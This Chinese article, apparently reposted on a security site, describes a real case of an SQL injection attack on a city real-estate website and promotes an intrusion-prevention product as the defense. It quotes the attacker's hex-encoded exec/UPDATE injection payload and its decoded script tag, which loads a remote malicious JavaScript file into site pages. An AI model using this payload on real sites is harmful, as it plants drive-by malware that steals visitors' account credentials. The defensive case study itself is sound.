警惕恶意软件 网站SQL注入防御实战

• 　　SQL注入作为直接威胁web业务的最严重攻击行为，已经被大多数的网站管理员所了解，这种通过HTTP标准端口，利用网页编码不严谨，提交精心构造的代码实现对数据库非授权访问的攻击方法，已经被越来越多的scriptguy（脚本小子）成功掌握并广泛实践。没错，他们可能并不知道SQL注入的原理，不知道ASP，不知道PHP，但他们有工具，全自动的，完善的，高效率的工具，这些工具使得任何一个有简单网络知识的中学学生可以很容易的拿到某个政府网站的最高管理员权限，而且做这些事情并不会比你在周六的中午下楼去买一听可乐要更困难。
  
  　　而随着互联网黑色产业链的浮出水面，骇客们发现攻击网站不仅仅可以用作向朋友炫耀的资本，还可以作为购买游戏点卡或者是数码相机的资金来源：在被攻击的网站嵌入脚本木马，可以轻易盗窃那些访问了受攻击网站，但个人PC安全防护措施不全面用户的私密信息，比如游戏账号密码，或者是银行账号密码。
  
  　　经常使用google的用户一定对这段话不陌生“该网站可能含有恶意软件，有可能会危害您的电脑”，这意味着这个网站也许已经遭遇挂马黑手，成为骇客们的众多取款点之一。本文就一例真实案例，来介绍一下网站的安全防护。
  
  　　某市房地产网站的管理员小李刚上班就被叫到领导办公室去了，因为网站带上了google小尾巴：“该网站可能含有恶意软件，有可能会危害您的电脑”，购房者看到这一提示信息，纷纷给该市房产管理局打电话，于是就有了上面的一幕。回到座位上的小李一筹莫展：网站服务器已经全盘杀毒好几次了，没有发现病毒存在的痕迹，看来只能找专业安全厂商解决了。小李选择的是国内著名的一家网络安全公司，在向该安全公司提交web日志的第二天，小李就收到了回信，从日志的分析结果中，可以清楚的看到骇客的攻击走向：这是一次非常典型的SQL注入攻击，首先使用dEcLaRe建立游标，遍历数据库中所有允许写入字符串的相关字段，并通过执行exec操作，使用update语句替换了网站页面的正常文件，插入了如下一段十六进制字符：
  
  　　exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']
  
  　　=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D68
  
  　　7474703A2F2F732E736565392E75732F732E6A733E3C2F7363
  
  　　726970743E3C212D2D%20aS%20vArChAr(67))')%20f
  
  　　经过解密，可以得到如下字符串
  
  　　"][/title][script src=http://s.see9.us/s.js][/script][!—
  
  　　这里面的http://s.see9.us/s.js就是导致网站带有小尾巴的罪魁祸首。
  
  　　经过一天的奋力工作，网页中所有的小尾巴都清理干净了，在安全工程师的建议下，小李还向StopBadware.org 申请了重新的索引，并向google提交了审核申请。做完了这些之后，小李又一次陷入了困扰：如何防范网站再次遭受SQL注入攻击呢？网络上提供了一些代码修改级的防御方法，可是需要对每一个页面都做仔细的检查，看着自己所负责网站的10000余个页面，小李只能是苦笑，联想起2007年夏天那次微软英国网站被SQL注入的案例，小李在内心否认了彻底检查一遍页面代码的做法。关键时刻，又是安全工程师提出了建议：部署天清入侵防御产品，利用天清IPS的基于注入攻击手法的检测原理，可以对各种SQL注入攻击的变种进行防御。和传统的SQL注入防御方法不一样的是，天清入侵防御产品可以独立部署，不需要对被保护的web系统做任何修改，而且和那些基于特征的检测方法不一样的是，天清IPS采用的VSID算法关注的是攻击手法而非攻击代码，其检测准确率有很大改善。
  
  　　在部署了入侵防御产品的当天晚上，小李就在入侵防御产品的控制中心看到了发现了SQL注入攻击并被阻断的报警信息，而网站安然无恙。
  
• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 警惕恶意软件 网站SQL注入防御实战 相关文章：
• ·无线网络攻防实战：WEP密钥如何被攻破的
• ·Cisco实战:配置三层交换的综合案例
• ·Photoshop & CorelDRAW商业实战：陶艺台灯包装设计
• ·CAD对齐命令实战运用
• ·CorelDRAW实战：彩色平面图设计
• ·开发技术：KETTLE JAVA API 开发实战记录
• ·J2ME蓝牙程序开发实战入门
• ·samba和openldap结合实战
• ·Oracle--SQL行列转换实战
• ·Word转换PDF格式的C#或ASP.Net实战
• 警惕恶意软件 网站SQL注入防御实战 相关软件
• ·真实战争(Real War)
• ·AutoCAD 实战妙技百问 VB051118
• ·《真实战争》简体中文版
• ·围棋实战训练 V5.2
• ·双色球实战宝典 V2.2.1.4
• ·喷血!情圣Larry泡妞实战

上一篇:轻松解决“正在连接”无线的故障

下一篇:破解系统连接数 流畅观看在线电影

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐